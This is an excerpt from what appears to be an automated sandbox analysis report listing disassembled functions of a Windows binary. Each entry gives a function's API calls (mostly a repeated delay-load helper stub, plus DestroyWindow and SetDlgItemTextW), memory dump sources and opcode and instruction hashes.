                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AcquireDloadExclusiveLockProtectSection
                                                                              • String ID:
                                                                              • API String ID: 3680172570-0
                                                                              • Opcode ID: d119bc28b2850780f3933daf254cbe6e61014507fbb6846c67c7c054f9a80852
                                                                              • Instruction ID: 55268b2169bec8a3d78cf8b8eae3972442c630369db438a2db486fb544f75b6a
                                                                              • Opcode Fuzzy Hash: d119bc28b2850780f3933daf254cbe6e61014507fbb6846c67c7c054f9a80852
                                                                              • Instruction Fuzzy Hash: 37D012787003C54ED225B76799467393369F714B40F444A03FA86E15E0CFB145C4CA35
                                                                              Function 00DDBA3B Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,00000000,?,00DDD8C1), ref: 00DDBA4C
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID:
                                                                              • API String ID: 3375834691-0
                                                                              • Opcode ID: cfce3bf95e56b68b4af9bb1d7986d131fed0ea29baeafc13d7d9330de5925e66
                                                                              • Instruction ID: f6b56061ea528ac97c4dcd998e35d9df96083a686fae4e54c30079c5bce0c759
                                                                              • Opcode Fuzzy Hash: cfce3bf95e56b68b4af9bb1d7986d131fed0ea29baeafc13d7d9330de5925e66
                                                                              • Instruction Fuzzy Hash: AEC01272022610DFD7268F08EA09796B3E4EB00766F18842EE067639A0C3B06898CB54
                                                                              Function 00DC2336 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetDlgItemTextW.USER32(000204C2,?,00000000), ref: 00DC2345
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ItemText
                                                                              • String ID:
                                                                              • API String ID: 3367045223-0
                                                                              • Opcode ID: fa22bc1554fd5d09a54af08b24ec485af75f588c0544d79b443f360ac0dec97e
                                                                              • Instruction ID: 10402f539b97f68babf82851a07a283a175812b4cc5766e29168ac606999bf88
                                                                              • Opcode Fuzzy Hash: fa22bc1554fd5d09a54af08b24ec485af75f588c0544d79b443f360ac0dec97e
                                                                              • Instruction Fuzzy Hash: 93B09BB51190317F92146714EC15CFF765DDFE5711705845EB405D3155CB600C81C5B9
                                                                              Function 00DE1AD1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: f3f702aae57e3f0ab14f38202f9381bf6b5b7596eb9bc4b9633eb54af6b357e6
                                                                              • Instruction ID: 75a7e0a8517d30d8774fa51296c11c11f3860eca5e37652633ee0d22816b5c57
                                                                              • Opcode Fuzzy Hash: f3f702aae57e3f0ab14f38202f9381bf6b5b7596eb9bc4b9633eb54af6b357e6
                                                                              • Instruction Fuzzy Hash: 8CB092AA39A740BC21046102690A83B011CD0C0B10360942AB000A008194808DC20035
                                                                              Function 00DE1AF6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 64a846f8dd4f71dcca3990be781f8821ee1b03afb3e5620b454a9994c2c873ba
                                                                              • Instruction ID: 9fbb22438986f9dbabb8e2d7c1e53d464428e1db41f24a1fa74dd5ba5b275506
                                                                              • Opcode Fuzzy Hash: 64a846f8dd4f71dcca3990be781f8821ee1b03afb3e5620b454a9994c2c873ba
                                                                              • Instruction Fuzzy Hash: 9FB012EA35A640FC310471476C0BC7F011CD0C2F10370D12FF400D42C0E4804CC50131
                                                                              Function 00DE1AEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 42ecd99db4cb9d979910e0bd502071549daada65807402083701feafcd44822b
                                                                              • Instruction ID: 92641a4ec8d88af10e2c97d0503016d5c40dae6d09b5b277a549f75680c451ec
                                                                              • Opcode Fuzzy Hash: 42ecd99db4cb9d979910e0bd502071549daada65807402083701feafcd44822b
                                                                              • Instruction Fuzzy Hash: BAB092EA35A644AC3104A106680A83B012CE0C0B10360902AB000D018194808CC10231
                                                                              Function 00DE1BD2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 9593479b66b0540b6a6c588d627026f3d539e6f3813fa659087859df258b9ff3
                                                                              • Instruction ID: f2663e35c26276e87956f41580940096b2d41566675ed440d05d7e30078860a1
                                                                              • Opcode Fuzzy Hash: 9593479b66b0540b6a6c588d627026f3d539e6f3813fa659087859df258b9ff3
                                                                              • Instruction Fuzzy Hash: 92B012EA35A640FC310471077C0BC3F011CE0C0F10370902FF000D11C0D4804CC10131
                                                                              Function 00DE1BC8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 12701c239866487437ba7cc60d8b19bd8a1357806c7720fa592993791966145d
                                                                              • Instruction ID: 5a3d9aa132081cebccd013ad1295dd84a98f9f0c4c30ae3ef5f3591578c20bc7
                                                                              • Opcode Fuzzy Hash: 12701c239866487437ba7cc60d8b19bd8a1357806c7720fa592993791966145d
                                                                              • Instruction Fuzzy Hash: 3AB012EA39A640FC310471076D0BC3F011CD0C0F10370903FF000D11C0D4804DC20131
                                                                              Function 00DE1B8C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 3d9aad0f4b7ae642a1ff90081361974ade6874d09ab9057cec570bf50ea1240a
                                                                              • Instruction ID: 5f6498449b782b46b73095ed8a2f050c4d618c17fe7ee7d6bc6f141177db97b3
                                                                              • Opcode Fuzzy Hash: 3d9aad0f4b7ae642a1ff90081361974ade6874d09ab9057cec570bf50ea1240a
                                                                              • Instruction Fuzzy Hash: F1B012EA35A640FC311472576C0BC3F011CD0C1F10370D02FF400D01C0E4804CC10131
                                                                              Function 00DE1B82 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: cb0075a605f8ae564f45722803082b3e136a8564739280ceb224cc631f8cc8ad
                                                                              • Instruction ID: 93d3576d04ba2ab57412212a847b9f55489331a9946ace980c9fff326d32419a
                                                                              • Opcode Fuzzy Hash: cb0075a605f8ae564f45722803082b3e136a8564739280ceb224cc631f8cc8ad
                                                                              • Instruction Fuzzy Hash: 72B092EA35A644AC31046106680AC3B015CE0C0B11370912AB100D0180948048C10131
                                                                              Function 00DE1BBE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 3c1d78bcd4b8bddc3dc4bd388abb9601d59aa033e0e8e017313de6bee5295832
                                                                              • Instruction ID: 01a216d34844051818b9b33ddcd89c400f4da43df5dcd8351dfe67c4826bcb9e
                                                                              • Opcode Fuzzy Hash: 3c1d78bcd4b8bddc3dc4bd388abb9601d59aa033e0e8e017313de6bee5295832
                                                                              • Instruction Fuzzy Hash: E7B092AA35A640AC21446106A80A83F011CD0C0B10360912AB440D1180948048C10131
                                                                              Function 00DE1BB4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: ed27f4f92818c2a0665b865eb87041765f5b85aafe67d7b9876e288e8e388daf
                                                                              • Instruction ID: 363db7fbe0ade3c4cd6fbc025816829035f87d23b5558d61c68ff8737d3d5dae
                                                                              • Opcode Fuzzy Hash: ed27f4f92818c2a0665b865eb87041765f5b85aafe67d7b9876e288e8e388daf
                                                                              • Instruction Fuzzy Hash: F8B092AA35A640AC21086146680A83F022CD0C1B10360902AB400D1180A48048C10531
                                                                              Function 00DE1BAA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 40a6f678c67c761a8ded1adcaf72f1b6100743d12565cf65994af758ae995e30
                                                                              • Instruction ID: 6a6f2017d977d025493bdb3af3e3d30c4df411b175e0e1e141864a3dd332fb6f
                                                                              • Opcode Fuzzy Hash: 40a6f678c67c761a8ded1adcaf72f1b6100743d12565cf65994af758ae995e30
                                                                              • Instruction Fuzzy Hash: E4B012EA35A640FC311472177C0BC3F011CE0C0F10370942FF000D01C0D4804CC10131
                                                                              Function 00DE1B50 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 1701c64f6940c9b17454a353099468ecaecf1258952c6a61528de8de6c65d441
                                                                              • Instruction ID: a8e4e92867827b4e4e306e8d18064e30d802114b212c9c67259916c70503293d
                                                                              • Opcode Fuzzy Hash: 1701c64f6940c9b17454a353099468ecaecf1258952c6a61528de8de6c65d441
                                                                              • Instruction Fuzzy Hash: C9B092AA39B640AC21046106690A83B011CD0C0B20360902AB000D0180948049C20131
                                                                              Function 00DE1B46 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: cb04b7d3bd445500754aede587dcc9d2dd4cd2acfd1349a58c142afa22e1b7d3
                                                                              • Instruction ID: 0cd5d39733291baadab6db311e41f5b3497335394c38756042b54d2349aa72d7
                                                                              • Opcode Fuzzy Hash: cb04b7d3bd445500754aede587dcc9d2dd4cd2acfd1349a58c142afa22e1b7d3
                                                                              • Instruction Fuzzy Hash: A8B092AA35A640AC21446206680A83B015CD0C0B20360912AB400D0180948048C10131
                                                                              Function 00DE1B78 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID:
                                                                              • API String ID: 1269201914-0
                                                                              • Opcode ID: 17567b780acf360bc3f84a4590664d09fd043eaac46110aad1c9aaa09d960140
                                                                              • Instruction ID: 076b8cd5d640e65efc16ad7d15eeb8742f505db4c4112427ad87fd3e45afdfd1
                                                                              • Opcode Fuzzy Hash: 17567b780acf360bc3f84a4590664d09fd043eaac46110aad1c9aaa09d960140
                                                                              • Instruction Fuzzy Hash: F6B092AA39A640AC21046106690AC3B01ACD0C0B11370902AB000D0180948049C20131
                                                                              Function 00DE1B6E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AE3
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
